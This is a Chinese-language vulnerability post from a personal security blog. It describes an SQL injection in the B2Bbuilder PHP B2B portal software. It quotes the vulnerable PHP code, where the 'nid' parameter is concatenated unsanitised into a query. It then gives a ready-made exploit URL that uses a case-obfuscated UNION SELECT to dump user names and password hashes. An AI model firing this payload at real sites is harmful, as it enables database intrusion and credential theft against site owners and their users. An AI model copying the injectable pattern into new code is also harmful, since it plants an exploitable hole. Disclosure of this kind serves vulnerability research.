我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>JAVA安全开发>> 漏洞信息Php行业网站B2Bbuilder Sql注入漏洞
Php行业网站B2Bbuilder Sql注入漏洞
4134
0推荐
0评论

B2Bbuilder能为您提供一个高效、稳定和强大的B2B电子商务行业门户网站解决方案.

wap/index.php

if (!empty($_GET["action"]))
$action=$_GET["action"];
else
$action="home";
//$action=empty($action)?"home":$_GET["action"];
//===============================
if(in_array($action, array('home','offer_cat','offer_list','offer_detail','product_cat','product_list','

product_detail','news_cat','news_list','news_detail','corporate_cat','corporate_list','

corporate_detail','search','corporate_moredetail','product_showimg')))
{
require'inc/'.$action.'.php';
}
news_cat.php文件

if(!empty($_GET['nid']))
{
$nid=$_GET['nid'];
$sql="select * from ".NEWSCAT." where pid=$nid";
$db->query($sql);
$sre=$db->getRows();
if(count($sre)>0)
{
foreach($sre as $v)
{
echo "[资讯]".$v['cat']."";
}
echo " 返回";
//echo " 后退";
}
else
{
header("Location:./?action=news_list&nid=".$nid);
exit();
}
}
随便一条错误的语句即可得到数据库前缀

exp:


http://site/b2b/wap/index.php?action=news_cat&nid=17%20and%201=2%20uNion%20select%201,concat(0x7E217E21,user,0x3A,password,0x7E217E21),3,4,5,6,7,8%20FROM%20

已经有 ( 0 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415